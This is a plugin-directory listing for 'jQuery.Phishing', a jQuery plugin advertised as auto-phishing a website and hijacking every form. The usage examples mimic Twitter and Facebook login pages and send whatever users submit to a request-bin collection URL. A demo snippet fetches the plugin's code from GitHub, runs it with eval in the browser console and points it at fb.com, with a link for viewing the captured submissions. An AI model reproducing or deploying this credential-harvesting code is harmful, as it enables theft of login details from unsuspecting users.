A repository of over 1000 quality jQuery plugins

jQuery jQuery.Phishing

jQuery.Phishing is a jQuery Uncategorised plugin.

Created by jackmasa

Auto phishing a website, and hijack all form.

Not what you're looking for? Click here to view more Uncategorised jQuery plugins

jQuery.Phishing

Usage

Phishing and Hijack All Form

$.phishing('https://twitter.com/login','//your_request_bin')

onload

$.phishing('https://twitter.com/login',()=>alert`onload`)

Demo

  1. Open your website
  2. F12 call dev-tool -> console -> input:
    $.get(`https://raw.githubusercontent.com/jackmasa/jQuery.Phishing/master/jQuery.Phishing.js`,c=>{
    eval(c);
    $.phishing(`//fb.com`,`//requestbin.herokuapp.com/1koaluq1`);
    });
  3. try submit form :)
  4. see result: http://requestb.in/1koaluq1?inspect


You might also like these other Uncategorised jQuery Plugins

  • lazeemenu

    Multi-level sidebar menu – JQuery plugin

  • hover3d

    Simple jQuery plugin for 3d Hover effect

  • jquery-idlecat

    Simple and lightweight jQuery plugin for user-presence detection.